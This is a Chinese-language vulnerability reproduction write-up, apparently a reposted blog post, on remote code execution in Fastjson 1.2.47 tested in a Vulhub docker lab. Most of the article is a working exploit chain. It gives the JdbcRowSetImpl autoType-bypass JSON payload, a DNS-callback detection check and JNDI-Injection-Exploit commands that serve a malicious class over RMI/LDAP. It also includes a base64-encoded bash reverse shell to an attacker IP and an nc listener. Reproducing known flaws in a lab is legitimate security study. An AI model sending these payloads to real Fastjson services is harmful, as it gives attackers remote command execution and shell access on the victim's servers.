当前位置: 首页 > news >正文

【漏洞复现】Fastjson_1.2.47_rce

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

文章目录

      • 1.1、漏洞描述
      • 1.2、漏洞等级
      • 1.3、影响版本
      • 1.4、漏洞复现
        • 1、基础环境
        • 2、漏洞检测
        • 3、漏洞验证
      • 1.5、深度利用
        • 1、反弹Shell

说明内容
漏洞编号
漏洞名称Fastjson_1.2.47_远程执行漏洞
漏洞评级
影响范围
漏洞描述
修复方案

1.1、漏洞描述

Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令

1.2、漏洞等级

高危

1.3、影响版本

1.2.47

1.4、漏洞复现

1、基础环境

Path:Vulhub/fastjson/1.2.47-rce


启动测试环境:

sudo docker-compose up -d

访问http://your-ip:8090/即可看到一个json对象被返回

在这里插入图片描述

将content-type修改为application/json后可向其POST新的JSON对象,后端会利用fastjson进行解析

发送测试数据:

{"name":"hello", "age":20}

在这里插入图片描述

2、漏洞检测

使用BurpSuite扩展插件FastjsonScan进行漏洞检测

在这里插入图片描述

POC:

{"axin":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"is":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://s0tgwxk05ll1qvmz0lwr27u0prvhj6.oastify.com/aaa","autoCommit":true}
}

使用dnslog测试

在这里插入图片描述

在这里插入图片描述

3、漏洞验证

利用JNDI-Injection-Exploit工具开启RMI服务器

/tmp目录下创建hello文件

┌──(kali㉿kali)-[~/tools/JNDI-Injection-Exploit/target]
└─$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/demo" -A "192.168.80.141"
[ADDRESS] >> 192.168.80.141
[COMMAND] >> touch /tmp/demo
----------------------------JNDI Links----------------------------
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/fuk3fq
ldap://192.168.80.141:1389/fuk3fq
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/slgipa
ldap://192.168.80.141:1389/slgipa
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://192.168.80.141:1099/zsjp7n----------------------------Server Log----------------------------
2023-09-08 03:53:56 [JETTYSERVER]>> Listening on 0.0.0.0:8180
2023-09-08 03:53:56 [RMISERVER]  >> Listening on 0.0.0.0:1099
2023-09-08 03:53:57 [LDAPSERVER] >> Listening on 0.0.0.0:1389

在这里插入图片描述

发送POC到FastJson服务器,通过RMI协议远程加载恶意类

{"axin":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"is":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://192.168.80.141:1099/slgipa","autoCommit":true}
}

在这里插入图片描述

进入docker容器内验证:

在这里插入图片描述

1.5、深度利用

1、反弹Shell

构造反弹shell,进行base64编码

bash -i >& /dev/tcp/192.168.80.141/1234 0>&1

在这里插入图片描述

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjE0MS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}

监听1234端口

nc -lvp 1234

开启RMI服务

┌──(kali㉿kali)-[~/tools/JNDI-Injection-Exploit/target]
└─$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjE0MS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}" -A "192.168.80.141"
[ADDRESS] >> 192.168.80.141
[COMMAND] >> bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjE0MS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}
----------------------------JNDI Links----------------------------
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/fd5cfs
ldap://192.168.80.141:1389/fd5cfs
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/flbdik
ldap://192.168.80.141:1389/flbdik
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://192.168.80.141:1099/m8yxp6----------------------------Server Log----------------------------
2023-09-08 04:02:36 [JETTYSERVER]>> Listening on 0.0.0.0:8180
2023-09-08 04:02:36 [RMISERVER]  >> Listening on 0.0.0.0:1099
2023-09-08 04:02:36 [LDAPSERVER] >> Listening on 0.0.0.0:1389

在这里插入图片描述

POC:

{"axin":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"is":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://192.168.80.141:1389/fd5cfs","autoCommit":true}
}

在这里插入图片描述

获得Shell

在这里插入图片描述

http://www.lryc.cn/news/218899.html

相关文章:

  • 玩转AIGC:如何选择最佳的Prompt提示词?
  • ELK搭建以及使用教程(多pipiline)
  • 小程序如何设置用户同意服务协议并上传头像和昵称
  • 6.4 例程:使用互斥量
  • [算法日志]图论: 深度优先搜索(DFS)
  • 这道经典SQL面试问题你会吗?
  • 网络服务退出一个问题的解析
  • 第四次pta认证P测试
  • mysql:B+树/事务
  • python-在系统托盘显示CPU使用率和内存使用率
  • 构建mono-repo风格的脚手架库
  • 云安全—etcd攻击面
  • 类锁和实例对象锁你分清了吗?
  • 如何在麒麟上安装 ONLYOFFICE 桌面编辑器
  • 记录:如何编写linux驱动,用module的方式
  • 3款免费又好用的 Docker 可视化管理工具
  • C语言--判断一个年份是否是闰年(详解)
  • Python---排序算法
  • gitlab Blocking and unblocking users
  • Swift 和 Python 两种语言中带关联信息错误(异常)类型的比较
  • 北京联通iptv组播配置
  • C++ STL 迭代器失效
  • 麒麟KYLINIOS软件仓库搭建02-软件仓库添加新的软件包
  • 专业媒体播放软件Movist Pro中文
  • 数据结构-邻接表广度优先搜索(C语言版)
  • Py之auto-gptq:auto-gptq的简介、安装、使用方法之详细攻略
  • 【Linux】Linux+Nginx部署项目(负载均衡动静分离)
  • C++笔记之vector的成员函数swap()和data()
  • Linux centos环境 安装谷歌浏览器
  • go-gin-vue3-elementPlus带参手动上传文件